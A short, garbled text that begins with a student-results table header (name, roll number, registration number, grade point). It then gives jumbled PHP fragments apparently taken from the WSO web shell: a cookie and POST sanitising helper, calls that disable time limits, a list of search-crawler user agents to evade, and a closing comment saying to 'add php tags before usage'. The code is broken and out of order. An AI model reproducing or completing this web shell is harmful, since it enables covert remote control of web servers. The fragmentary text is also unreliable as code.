Student Name Roll No. Reg. No Course Name Gread Point
}
$_COOKIE = WSOstripslashes($_COOKIE);
$_POST = WSOstripslashes($_POST);
}
function WSOstripslashes($array) {
if(get_magic_quotes_gpc()) {
@set_magic_quotes_runtime(0);
@set_time_limit(0);
}
}
exit;
$userAgents = array("Google" "ia_archiver" "Yandex" "Rambler");
$default_use_ajax = true;
$color = "#df5";
?>
//add php tags before usage